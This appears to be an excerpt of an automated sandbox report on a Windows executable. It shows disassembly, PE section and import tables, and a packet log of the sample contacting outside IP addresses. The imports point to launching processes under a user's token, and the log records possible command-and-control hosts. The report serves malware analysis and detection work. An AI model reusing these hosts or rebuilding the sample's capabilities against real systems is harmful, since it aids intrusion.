                                                                                            add esp, 28h
                                                                                            ret
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            inc eax
                                                                                            push ebx
                                                                                            inc ebp
                                                                                            mov ebx, dword ptr [eax]
                                                                                            dec eax
                                                                                            mov ebx, edx
                                                                                            inc ecx
                                                                                            and ebx, FFFFFFF8h
                                                                                            dec esp
                                                                                            mov ecx, ecx
                                                                                            inc ecx
                                                                                            test byte ptr [eax], 00000004h
                                                                                            dec esp
                                                                                            mov edx, ecx
                                                                                            je 00007F6760B2A3E5h
                                                                                            inc ecx
                                                                                            mov eax, dword ptr [eax+08h]
                                                                                            dec ebp
                                                                                            arpl word ptr [eax+04h], dx
                                                                                            neg eax
                                                                                            dec esp
                                                                                            add edx, ecx
                                                                                            dec eax
                                                                                            arpl ax, cx
                                                                                            dec esp
                                                                                            and edx, ecx
                                                                                            dec ecx
                                                                                            arpl bx, ax
                                                                                            dec edx
                                                                                            mov edx, dword ptr [eax+edx]
                                                                                            dec eax
                                                                                            mov eax, dword ptr [ebx+10h]
                                                                                            mov ecx, dword ptr [eax+08h]
                                                                                            dec eax
                                                                                            mov eax, dword ptr [ebx+08h]
                                                                                            test byte ptr [ecx+eax+03h], 0000000Fh
                                                                                            je 00007F6760B2A3DDh
                                                                                            movzx eax, byte ptr [ecx+eax+03h]
                                                                                            and eax, FFFFFFF0h
                                                                                            dec esp
                                                                                            add ecx, eax
                                                                                            dec esp
                                                                                            xor ecx, edx
                                                                                            dec ecx
                                                                                            mov ecx, ecx
                                                                                            pop ebx
                                                                                            jmp 00007F6760B2A04Eh
                                                                                            int3
                                                                                            dec eax
                                                                                            mov dword ptr [esp+10h], ebx
                                                                                            dec eax
                                                                                            mov dword ptr [esp+18h], esi
                                                                                            push ebp
                                                                                            push edi
                                                                                            inc ecx
                                                                                            push esi
                                                                                            dec eax
                                                                                            mov ebp, esp
                                                                                            dec eax
                                                                                            sub esp, 10h
                                                                                            xor eax, eax
                                                                                            xor ecx, ecx
                                                                                            cpuid
                                                                                            inc esp
                                                                                            mov eax, ecx
                                                                                            inc esp
                                                                                            mov edx, edx
                                                                                            inc ecx
                                                                                            xor edx, 49656E69h
                                                                                            inc ecx
                                                                                            xor eax, 6C65746Eh
                                                                                            inc esp
                                                                                            mov ecx, ebx
                                                                                            inc esp
                                                                                            mov esi, eax
                                                                                            xor ecx, ecx

                                                                                            Data Directories

                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xdf6d840x50.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xe000000x1e8.rsrc
                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0xdfb0000x3990.pdata
                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xe010000xa84.reloc
                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0xdef6400x38.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xdef5000x140.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x420000x3a8.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                            Sections

                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                            .text0x10000x401c00x402007e7af9824a1ecaab91d08d883e6c58e1False0.5116578338206628data6.455695053837932IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                            .rdata0x420000xdb5a0a0xdb5c00599d0ef5af81139735ec1926aa267a43unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                            .data0xdf80000x2ef00x180071489ac90d03a11ae4c0277ac0194539False0.18505859375DOS executable (block device driver)3.2411881026098075IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                            .pdata0xdfb0000x39900x3a00e88e23efaca95868c109cbcc6abeec3dFalse0.4774380387931034data5.631575537976179IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                            .fptable0xdff0000x1000x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                            .rsrc0xe000000x1e80x200023deb8c7350ae93fdd16d73de779d8eFalse0.541015625data4.756146432197578IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                            .reloc0xe010000xa840xc0013f75fec917993ceb253d090e12e5a2fFalse0.4716796875data5.144439829458611IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                            Resources

                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                            RT_MANIFEST0xe000600x188XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5892857142857143

                                                                                            Imports

                                                                                            DLLImport
                                                                                            WTSAPI32.dllWTSQueryUserToken
                                                                                            KERNEL32.dllGetSystemDirectoryW, OpenProcess, CreateToolhelp32Snapshot, Process32NextW, WaitForSingleObject, CloseHandle, WTSGetActiveConsoleSessionId, CreateProcessW, WriteConsoleW, GetModuleFileNameW, TerminateProcess, GetModuleHandleExW, SetEndOfFile, Process32FirstW, CreateDirectoryW, CreateFileW, FindClose, FindFirstFileW, FindFirstFileExW, FindNextFileW, GetFileAttributesExW, GetFileInformationByHandle, SetFileInformationByHandle, AreFileApisANSI, GetLastError, DeviceIoControl, GetModuleHandleW, GetProcAddress, CopyFileW, GetFileInformationByHandleEx, CreateSymbolicLinkW, MultiByteToWideChar, WideCharToMultiByte, LocalFree, FormatMessageA, GetLocaleInfoEx, QueryPerformanceCounter, QueryPerformanceFrequency, GetStringTypeW, Sleep, GetCurrentThreadId, CompareStringEx, InitializeCriticalSectionEx, GetSystemTimeAsFileTime, RtlUnwind, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, EncodePointer, DecodePointer, LCMapStringEx, GetCPInfo, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, IsProcessorFeaturePresent, GetCurrentProcessId, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, RtlUnwindEx, RtlPcToFileHeader, RaiseException, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, GetStdHandle, WriteFile, ExitProcess, GetFileSizeEx, SetFilePointerEx, GetFileType, HeapAlloc, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, HeapFree, HeapReAlloc, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, VirtualProtect, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, ReadFile, ReadConsoleW, IsValidCodePage, GetACP, GetOEMCP, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetProcessHeap, HeapSize
                                                                                            ADVAPI32.dllRegSetValueExW, RegOpenKeyExW, CreateProcessAsUserW, RegQueryValueExW, RegCloseKey

                                                                                            Possible Origin

                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                            EnglishUnited States

                                                                                            Network Behavior

                                                                                            Network Port Distribution

                                                                                            TCP Packets

                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Dec 20, 2024 16:20:17.451617002 CET497085432192.168.2.8194.26.192.189
                                                                                            Dec 20, 2024 16:20:17.572523117 CET543249708194.26.192.189192.168.2.8
                                                                                            Dec 20, 2024 16:20:17.572650909 CET497085432192.168.2.8194.26.192.189
                                                                                            Dec 20, 2024 16:20:17.573303938 CET497085432192.168.2.8194.26.192.189
                                                                                            Dec 20, 2024 16:20:17.692995071 CET543249708194.26.192.189192.168.2.8
                                                                                            Dec 20, 2024 16:20:18.843019009 CET543249708194.26.192.189192.168.2.8
                                                                                            Dec 20, 2024 16:20:18.861540079 CET497085432192.168.2.8194.26.192.189
                                                                                            Dec 20, 2024 16:20:18.981287003 CET543249708194.26.192.189192.168.2.8
                                                                                            Dec 20, 2024 16:20:19.253673077 CET543249708194.26.192.189192.168.2.8
                                                                                            Dec 20, 2024 16:20:19.256244898 CET497085432192.168.2.8194.26.192.189
                                                                                            Dec 20, 2024 16:20:19.376049042 CET543249708194.26.192.189192.168.2.8
                                                                                            Dec 20, 2024 16:20:19.650233030 CET543249708194.26.192.189192.168.2.8
                                                                                            Dec 20, 2024 16:20:19.650504112 CET543249708194.26.192.189192.168.2.8
                                                                                            Dec 20, 2024 16:20:19.650589943 CET497085432192.168.2.8194.26.192.189
                                                                                            Dec 20, 2024 16:20:19.652318954 CET497085432192.168.2.8194.26.192.189
                                                                                            Dec 20, 2024 16:20:19.652318954 CET497085432192.168.2.8194.26.192.189
                                                                                            Dec 20, 2024 16:20:19.771821976 CET543249708194.26.192.189192.168.2.8
                                                                                            Dec 20, 2024 16:20:19.771922112 CET543249708194.26.192.189192.168.2.8
                                                                                            Dec 20, 2024 16:20:20.043757915 CET543249708194.26.192.189192.168.2.8
                                                                                            Dec 20, 2024 16:20:20.044547081 CET497085432192.168.2.8194.26.192.189
                                                                                            Dec 20, 2024 16:20:20.164125919 CET543249708194.26.192.189192.168.2.8
                                                                                            Dec 20, 2024 16:20:20.434530020 CET543249708194.26.192.189192.168.2.8
                                                                                            Dec 20, 2024 16:20:20.441181898 CET497085432192.168.2.8194.26.192.189
                                                                                            Dec 20, 2024 16:20:20.565058947 CET543249708194.26.192.189192.168.2.8
                                                                                            Dec 20, 2024 16:20:20.838143110 CET543249708194.26.192.189192.168.2.8
                                                                                            Dec 20, 2024 16:20:20.838418961 CET497085432192.168.2.8194.26.192.189
                                                                                            Dec 20, 2024 16:20:20.958082914 CET543249708194.26.192.189192.168.2.8
                                                                                            Dec 20, 2024 16:20:21.229191065 CET543249708194.26.192.189192.168.2.8
                                                                                            Dec 20, 2024 16:20:21.229456902 CET497085432192.168.2.8194.26.192.189
                                                                                            Dec 20, 2024 16:20:21.349425077 CET543249708194.26.192.189192.168.2.8
                                                                                            Dec 20, 2024 16:20:21.621264935 CET543249708194.26.192.189192.168.2.8
                                                                                            Dec 20, 2024 16:20:21.621366024 CET543249708194.26.192.189192.168.2.8
                                                                                            Dec 20, 2024 16:20:21.621436119 CET497085432192.168.2.8194.26.192.189
                                                                                            Dec 20, 2024 16:20:21.621606112 CET497085432192.168.2.8194.26.192.189
                                                                                            Dec 20, 2024 16:20:21.741039038 CET543249708194.26.192.189192.168.2.8
                                                                                            Dec 20, 2024 16:20:22.012185097 CET543249708194.26.192.189192.168.2.8
                                                                                            Dec 20, 2024 16:20:22.012413025 CET497085432192.168.2.8194.26.192.189
                                                                                            Dec 20, 2024 16:20:22.012476921 CET497085432192.168.2.8194.26.192.189
                                                                                            Dec 20, 2024 16:20:22.012629986 CET497085432192.168.2.8194.26.192.189
                                                                                            Dec 20, 2024 16:20:22.132019997 CET543249708194.26.192.189192.168.2.8
                                                                                            Dec 20, 2024 16:20:22.132036924 CET543249708194.26.192.189192.168.2.8
                                                                                            Dec 20, 2024 16:20:22.132621050 CET543249708194.26.192.189192.168.2.8
                                                                                            Dec 20, 2024 16:20:22.132769108 CET497085432192.168.2.8194.26.192.189
                                                                                            Dec 20, 2024 16:20:22.160150051 CET49711443192.168.2.834.117.59.81
                                                                                            Dec 20, 2024 16:20:22.160200119 CET4434971134.117.59.81192.168.2.8
                                                                                            Dec 20, 2024 16:20:22.160269976 CET49711443192.168.2.834.117.59.81
                                                                                            Dec 20, 2024 16:20:22.176659107 CET49711443192.168.2.834.117.59.81
                                                                                            Dec 20, 2024 16:20:22.176685095 CET4434971134.117.59.81192.168.2.8
                                                                                            Dec 20, 2024 16:20:23.393135071 CET4434971134.117.59.81192.168.2.8
                                                                                            Dec 20, 2024 16:20:23.393254995 CET49711443192.168.2.834.117.59.81
                                                                                            Dec 20, 2024 16:20:23.405493021 CET49711443192.168.2.834.117.59.81
                                                                                            Dec 20, 2024 16:20:23.405633926 CET4434971134.117.59.81192.168.2.8
                                                                                            Dec 20, 2024 16:20:23.405797005 CET49711443192.168.2.834.117.59.81
                                                                                            Dec 20, 2024 16:20:28.429970980 CET49714443192.168.2.834.117.59.81
                                                                                            Dec 20, 2024 16:20:28.430030107 CET4434971434.117.59.81192.168.2.8
                                                                                            Dec 20, 2024 16:20:28.430123091 CET49714443192.168.2.834.117.59.81
                                                                                            Dec 20, 2024 16:20:28.430460930 CET49714443192.168.2.834.117.59.81
                                                                                            Dec 20, 2024 16:20:28.430480003 CET4434971434.117.59.81192.168.2.8
                                                                                            Dec 20, 2024 16:20:29.642488956 CET4434971434.117.59.81192.168.2.8
                                                                                            Dec 20, 2024 16:20:29.642568111 CET49714443192.168.2.834.117.59.81
                                                                                            Dec 20, 2024 16:20:29.644191980 CET49714443192.168.2.834.117.59.81
                                                                                            Dec 20, 2024 16:20:29.644202948 CET4434971434.117.59.81192.168.2.8
                                                                                            Dec 20, 2024 16:20:29.644453049 CET4434971434.117.59.81192.168.2.8
                                                                                            Dec 20, 2024 16:20:29.647094965 CET49714443192.168.2.834.117.59.81
                                                                                            Dec 20, 2024 16:20:29.691333055 CET4434971434.117.59.81192.168.2.8
                                                                                            Dec 20, 2024 16:20:30.110848904 CET4434971434.117.59.81192.168.2.8
                                                                                            Dec 20, 2024 16:20:30.110938072 CET4434971434.117.59.81192.168.2.8
                                                                                            Dec 20, 2024 16:20:30.111005068 CET49714443192.168.2.834.117.59.81
                                                                                            Dec 20, 2024 16:20:30.111392021 CET49714443192.168.2.834.117.59.81
                                                                                            Dec 20, 2024 16:20:30.111413956 CET4434971434.117.59.81192.168.2.8
                                                                                            Dec 20, 2024 16:20:30.560251951 CET4971780192.168.2.845.94.31.128
                                                                                            Dec 20, 2024 16:20:30.679778099 CET804971745.94.31.128192.168.2.8
                                                                                            Dec 20, 2024 16:20:30.680000067 CET4971780192.168.2.845.94.31.128
                                                                                            Dec 20, 2024 16:20:30.680303097 CET4971780192.168.2.845.94.31.128
                                                                                            Dec 20, 2024 16:20:30.799770117 CET804971745.94.31.128192.168.2.8
                                                                                            Dec 20, 2024 16:20:31.921175957 CET804971745.94.31.128192.168.2.8
                                                                                            Dec 20, 2024 16:20:31.967457056 CET4971780192.168.2.845.94.31.128
                                                                                            Dec 20, 2024 16:20:36.936506987 CET4971780192.168.2.845.94.31.128
                                                                                            Dec 20, 2024 16:20:36.939635992 CET4972080192.168.2.845.94.31.128
                                                                                            Dec 20, 2024 16:20:37.056837082 CET804971745.94.31.128192.168.2.8
                                                                                            Dec 20, 2024 16:20:37.056935072 CET4971780192.168.2.845.94.31.128
                                                                                            Dec 20, 2024 16:20:37.059355021 CET804972045.94.31.128192.168.2.8
                                                                                            Dec 20, 2024 16:20:37.059462070 CET4972080192.168.2.845.94.31.128
                                                                                            Dec 20, 2024 16:20:37.059886932 CET4972080192.168.2.845.94.31.128
                                                                                            Dec 20, 2024 16:20:37.179503918 CET804972045.94.31.128192.168.2.8
                                                                                            Dec 20, 2024 16:20:38.300461054 CET804972045.94.31.128192.168.2.8
                                                                                            Dec 20, 2024 16:20:38.342447042 CET4972080192.168.2.845.94.31.128
                                                                                            Dec 20, 2024 16:20:43.454044104 CET49723443192.168.2.88.8.4.4
                                                                                            Dec 20, 2024 16:20:43.454093933 CET443497238.8.4.4192.168.2.8
                                                                                            Dec 20, 2024 16:20:43.454190969 CET49723443192.168.2.88.8.4.4
                                                                                            Dec 20, 2024 16:20:43.454638958 CET49723443192.168.2.88.8.4.4
                                                                                            Dec 20, 2024 16:20:43.454663038 CET443497238.8.4.4192.168.2.8
                                                                                            Dec 20, 2024 16:20:44.696280956 CET443497238.8.4.4192.168.2.8
                                                                                            Dec 20, 2024 16:20:44.696474075 CET49723443192.168.2.88.8.4.4
                                                                                            Dec 20, 2024 16:20:44.697926044 CET49723443192.168.2.88.8.4.4
                                                                                            Dec 20, 2024 16:20:44.698086977 CET443497238.8.4.4192.168.2.8
                                                                                            Dec 20, 2024 16:20:44.698187113 CET49723443192.168.2.88.8.4.4
                                                                                            Dec 20, 2024 16:20:49.705243111 CET49727443192.168.2.88.8.4.4
                                                                                            Dec 20, 2024 16:20:49.705301046 CET443497278.8.4.4192.168.2.8
                                                                                            Dec 20, 2024 16:20:49.705408096 CET49727443192.168.2.88.8.4.4
                                                                                            Dec 20, 2024 16:20:49.705791950 CET49727443192.168.2.88.8.4.4
                                                                                            Dec 20, 2024 16:20:49.705806971 CET443497278.8.4.4192.168.2.8
                                                                                            Dec 20, 2024 16:20:51.061996937 CET443497278.8.4.4192.168.2.8
                                                                                            Dec 20, 2024 16:20:51.062074900 CET49727443192.168.2.88.8.4.4
                                                                                            Dec 20, 2024 16:20:51.063292027 CET49727443192.168.2.88.8.4.4
                                                                                            Dec 20, 2024 16:20:51.063298941 CET443497278.8.4.4192.168.2.8
                                                                                            Dec 20, 2024 16:20:51.063658953 CET443497278.8.4.4192.168.2.8
                                                                                            Dec 20, 2024 16:20:51.063946962 CET49727443192.168.2.88.8.4.4
                                                                                            Dec 20, 2024 16:20:51.107322931 CET443497278.8.4.4192.168.2.8
                                                                                            Dec 20, 2024 16:20:51.508138895 CET443497278.8.4.4192.168.2.8
                                                                                            Dec 20, 2024 16:20:51.508558989 CET443497278.8.4.4192.168.2.8
                                                                                            Dec 20, 2024 16:20:51.508622885 CET49727443192.168.2.88.8.4.4
                                                                                            Dec 20, 2024 16:20:51.509156942 CET49727443192.168.2.88.8.4.4
                                                                                            Dec 20, 2024 16:20:51.509191036 CET443497278.8.4.4192.168.2.8
                                                                                            Dec 20, 2024 16:20:51.517673016 CET4972080192.168.2.845.94.31.128
                                                                                            Dec 20, 2024 16:20:51.517987967 CET4972980192.168.2.845.94.31.128
                                                                                            Dec 20, 2024 16:20:51.637552977 CET804972945.94.31.128192.168.2.8
                                                                                            Dec 20, 2024 16:20:51.637734890 CET4972980192.168.2.845.94.31.128
                                                                                            Dec 20, 2024 16:20:51.637844086 CET804972045.94.31.128192.168.2.8
                                                                                            Dec 20, 2024 16:20:51.637906075 CET4972980192.168.2.845.94.31.128
                                                                                            Dec 20, 2024 16:20:51.637919903 CET4972080192.168.2.845.94.31.128
                                                                                            Dec 20, 2024 16:20:51.757693052 CET804972945.94.31.128192.168.2.8
                                                                                            Dec 20, 2024 16:20:52.890250921 CET804972945.94.31.128192.168.2.8
                                                                                            Dec 20, 2024 16:20:52.890517950 CET4972980192.168.2.845.94.31.128
                                                                                            Dec 20, 2024 16:20:53.011092901 CET804972945.94.31.128192.168.2.8
                                                                                            Dec 20, 2024 16:20:53.011337042 CET4972980192.168.2.845.94.31.128
                                                                                            Dec 20, 2024 16:21:03.424055099 CET49761443192.168.2.88.8.4.4
                                                                                            Dec 20, 2024 16:21:03.424099922 CET443497618.8.4.4192.168.2.8
                                                                                            Dec 20, 2024 16:21:03.424158096 CET49761443192.168.2.88.8.4.4
                                                                                            Dec 20, 2024 16:21:03.424722910 CET49761443192.168.2.88.8.4.4
                                                                                            Dec 20, 2024 16:21:03.424736977 CET443497618.8.4.4192.168.2.8
                                                                                            Dec 20, 2024 16:21:04.644329071 CET443497618.8.4.4192.168.2.8
                                                                                            Dec 20, 2024 16:21:04.644484997 CET49761443192.168.2.88.8.4.4
                                                                                            Dec 20, 2024 16:21:04.645885944 CET49761443192.168.2.88.8.4.4
                                                                                            Dec 20, 2024 16:21:04.646003962 CET443497618.8.4.4192.168.2.8
                                                                                            Dec 20, 2024 16:21:04.646099091 CET49761443192.168.2.88.8.4.4
                                                                                            Dec 20, 2024 16:21:09.658533096 CET49779443192.168.2.88.8.4.4
                                                                                            Dec 20, 2024 16:21:09.658574104 CET443497798.8.4.4192.168.2.8
                                                                                            Dec 20, 2024 16:21:09.658678055 CET49779443192.168.2.88.8.4.4
                                                                                            Dec 20, 2024 16:21:09.659234047 CET49779443192.168.2.88.8.4.4
                                                                                            Dec 20, 2024 16:21:09.659255028 CET443497798.8.4.4192.168.2.8
                                                                                            Dec 20, 2024 16:21:10.881364107 CET443497798.8.4.4192.168.2.8
                                                                                            Dec 20, 2024 16:21:10.881495953 CET49779443192.168.2.88.8.4.4
                                                                                            Dec 20, 2024 16:21:10.883058071 CET49779443192.168.2.88.8.4.4
                                                                                            Dec 20, 2024 16:21:10.883069992 CET443497798.8.4.4192.168.2.8
                                                                                            Dec 20, 2024 16:21:10.883464098 CET443497798.8.4.4192.168.2.8
                                                                                            Dec 20, 2024 16:21:10.883788109 CET49779443192.168.2.88.8.4.4
                                                                                            Dec 20, 2024 16:21:10.927336931 CET443497798.8.4.4192.168.2.8
                                                                                            Dec 20, 2024 16:21:11.324055910 CET443497798.8.4.4192.168.2.8
                                                                                            Dec 20, 2024 16:21:11.324187994 CET443497798.8.4.4192.168.2.8
                                                                                            Dec 20, 2024 16:21:11.324233055 CET49779443192.168.2.88.8.4.4
                                                                                            Dec 20, 2024 16:21:11.324493885 CET49779443192.168.2.88.8.4.4
                                                                                            Dec 20, 2024 16:21:11.324512005 CET443497798.8.4.4192.168.2.8
                                                                                            Dec 20, 2024 16:21:11.471378088 CET49785443192.168.2.820.233.83.145
                                                                                            Dec 20, 2024 16:21:11.471430063 CET4434978520.233.83.145192.168.2.8
                                                                                            Dec 20, 2024 16:21:11.471535921 CET49785443192.168.2.820.233.83.145
                                                                                            Dec 20, 2024 16:21:11.471900940 CET49785443192.168.2.820.233.83.145
                                                                                            Dec 20, 2024 16:21:11.471913099 CET4434978520.233.83.145192.168.2.8
                                                                                            Dec 20, 2024 16:21:13.049619913 CET4434978520.233.83.145192.168.2.8
                                                                                            Dec 20, 2024 16:21:13.049757004 CET49785443192.168.2.820.233.83.145
                                                                                            Dec 20, 2024 16:21:13.053733110 CET49785443192.168.2.820.233.83.145
                                                                                            Dec 20, 2024 16:21:13.053812981 CET4434978520.233.83.145192.168.2.8
                                                                                            Dec 20, 2024 16:21:13.053904057 CET49785443192.168.2.820.233.83.145
                                                                                            Dec 20, 2024 16:21:18.203618050 CET49804443192.168.2.820.233.83.145
                                                                                            Dec 20, 2024 16:21:18.203654051 CET4434980420.233.83.145192.168.2.8
                                                                                            Dec 20, 2024 16:21:18.203767061 CET49804443192.168.2.820.233.83.145
                                                                                            Dec 20, 2024 16:21:18.204109907 CET49804443192.168.2.820.233.83.145
                                                                                            Dec 20, 2024 16:21:18.204119921 CET4434980420.233.83.145192.168.2.8
                                                                                            Dec 20, 2024 16:21:19.782511950 CET4434980420.233.83.145192.168.2.8
                                                                                            Dec 20, 2024 16:21:19.782582998 CET49804443192.168.2.820.233.83.145
                                                                                            Dec 20, 2024 16:21:19.784086943 CET49804443192.168.2.820.233.83.145
                                                                                            Dec 20, 2024 16:21:19.784109116 CET4434980420.233.83.145192.168.2.8
                                                                                            Dec 20, 2024 16:21:19.784390926 CET4434980420.233.83.145192.168.2.8
                                                                                            Dec 20, 2024 16:21:19.784734011 CET49804443192.168.2.820.233.83.145
                                                                                            Dec 20, 2024 16:21:19.831326008 CET4434980420.233.83.145192.168.2.8
                                                                                            Dec 20, 2024 16:21:20.464659929 CET4434980420.233.83.145192.168.2.8
                                                                                            Dec 20, 2024 16:21:20.465090036 CET4434980420.233.83.145192.168.2.8
                                                                                            Dec 20, 2024 16:21:20.465146065 CET49804443192.168.2.820.233.83.145
                                                                                            Dec 20, 2024 16:21:20.465161085 CET4434980420.233.83.145192.168.2.8
                                                                                            Dec 20, 2024 16:21:20.465217113 CET49804443192.168.2.820.233.83.145
                                                                                            Dec 20, 2024 16:21:20.465390921 CET49804443192.168.2.820.233.83.145
                                                                                            Dec 20, 2024 16:21:20.465409994 CET4434980420.233.83.145192.168.2.8
                                                                                            Dec 20, 2024 16:21:20.610847950 CET49814443192.168.2.8185.199.108.133
                                                                                            Dec 20, 2024 16:21:20.610884905 CET44349814185.199.108.133192.168.2.8
                                                                                            Dec 20, 2024 16:21:20.611450911 CET49814443192.168.2.8185.199.108.133
                                                                                            Dec 20, 2024 16:21:20.612143040 CET49814443192.168.2.8185.199.108.133
                                                                                            Dec 20, 2024 16:21:20.612154007 CET44349814185.199.108.133192.168.2.8
                                                                                            Dec 20, 2024 16:21:21.829740047 CET44349814185.199.108.133192.168.2.8
                                                                                            Dec 20, 2024 16:21:21.829865932 CET49814443192.168.2.8185.199.108.133
                                                                                            Dec 20, 2024 16:21:21.831206083 CET49814443192.168.2.8185.199.108.133
                                                                                            Dec 20, 2024 16:21:21.831245899 CET44349814185.199.108.133192.168.2.8
                                                                                            Dec 20, 2024 16:21:21.831305027 CET49814443192.168.2.8185.199.108.133
                                                                                            Dec 20, 2024 16:21:26.895055056 CET49829443192.168.2.8185.199.108.133
                                                                                            Dec 20, 2024 16:21:26.895097017 CET44349829185.199.108.133192.168.2.8
                                                                                            Dec 20, 2024 16:21:26.895230055 CET49829443192.168.2.8185.199.108.133
                                                                                            Dec 20, 2024 16:21:26.903223038 CET49829443192.168.2.8185.199.108.133
                                                                                            Dec 20, 2024 16:21:26.903239012 CET44349829185.199.108.133192.168.2.8
                                                                                            Dec 20, 2024 16:21:28.116705894 CET44349829185.199.108.133192.168.2.8
                                                                                            Dec 20, 2024 16:21:28.116849899 CET49829443192.168.2.8185.199.108.133
                                                                                            Dec 20, 2024 16:21:28.118172884 CET49829443192.168.2.8185.199.108.133
                                                                                            Dec 20, 2024 16:21:28.118179083 CET44349829185.199.108.133192.168.2.8
                                                                                            Dec 20, 2024 16:21:28.118496895 CET44349829185.199.108.133192.168.2.8
                                                                                            Dec 20, 2024 16:21:28.119077921 CET49829443192.168.2.8185.199.108.133
                                                                                            Dec 20, 2024 16:21:28.163322926 CET44349829185.199.108.133192.168.2.8
                                                                                            Dec 20, 2024 16:21:28.558060884 CET44349829185.199.108.133192.168.2.8
                                                                                            Dec 20, 2024 16:21:28.558254957 CET44349829185.199.108.133192.168.2.8
                                                                                            Dec 20, 2024 16:21:28.558365107 CET49829443192.168.2.8185.199.108.133
                                                                                            Dec 20, 2024 16:21:28.558554888 CET49829443192.168.2.8185.199.108.133
                                                                                            Dec 20, 2024 16:21:28.558569908 CET44349829185.199.108.133192.168.2.8
                                                                                            Dec 20, 2024 16:21:28.561605930 CET49835443192.168.2.820.233.83.145
                                                                                            Dec 20, 2024 16:21:28.561650991 CET4434983520.233.83.145192.168.2.8
                                                                                            Dec 20, 2024 16:21:28.561752081 CET49835443192.168.2.820.233.83.145
                                                                                            Dec 20, 2024 16:21:28.562208891 CET49835443192.168.2.820.233.83.145
                                                                                            Dec 20, 2024 16:21:28.562225103 CET4434983520.233.83.145192.168.2.8
                                                                                            Dec 20, 2024 16:21:30.141236067 CET4434983520.233.83.145192.168.2.8
                                                                                            Dec 20, 2024 16:21:30.141320944 CET49835443192.168.2.820.233.83.145
                                                                                            Dec 20, 2024 16:21:30.142369986 CET49835443192.168.2.820.233.83.145
                                                                                            Dec 20, 2024 16:21:30.142405033 CET4434983520.233.83.145192.168.2.8
                                                                                            Dec 20, 2024 16:21:30.142505884 CET49835443192.168.2.820.233.83.145
                                                                                            Dec 20, 2024 16:21:35.157934904 CET49853443192.168.2.820.233.83.145
                                                                                            Dec 20, 2024 16:21:35.157989979 CET4434985320.233.83.145192.168.2.8
                                                                                            Dec 20, 2024 16:21:35.158090115 CET49853443192.168.2.820.233.83.145
                                                                                            Dec 20, 2024 16:21:35.158487082 CET49853443192.168.2.820.233.83.145
                                                                                            Dec 20, 2024 16:21:35.158500910 CET4434985320.233.83.145192.168.2.8
                                                                                            Dec 20, 2024 16:21:36.734823942 CET4434985320.233.83.145192.168.2.8
                                                                                            Dec 20, 2024 16:21:36.734944105 CET49853443192.168.2.820.233.83.145
                                                                                            Dec 20, 2024 16:21:36.736649036 CET49853443192.168.2.820.233.83.145
                                                                                            Dec 20, 2024 16:21:36.736665010 CET4434985320.233.83.145192.168.2.8
                                                                                            Dec 20, 2024 16:21:36.736910105 CET4434985320.233.83.145192.168.2.8
                                                                                            Dec 20, 2024 16:21:36.737279892 CET49853443192.168.2.820.233.83.145
                                                                                            Dec 20, 2024 16:21:36.779336929 CET4434985320.233.83.145192.168.2.8
                                                                                            Dec 20, 2024 16:21:37.440124989 CET4434985320.233.83.145192.168.2.8
                                                                                            Dec 20, 2024 16:21:37.440305948 CET4434985320.233.83.145192.168.2.8
                                                                                            Dec 20, 2024 16:21:37.440372944 CET4434985320.233.83.145192.168.2.8
                                                                                            Dec 20, 2024 16:21:37.440377951 CET49853443192.168.2.820.233.83.145
                                                                                            Dec 20, 2024 16:21:37.440424919 CET49853443192.168.2.820.233.83.145
                                                                                            Dec 20, 2024 16:21:37.440778017 CET49853443192.168.2.820.233.83.145
                                                                                            Dec 20, 2024 16:21:37.440795898 CET4434985320.233.83.145192.168.2.8
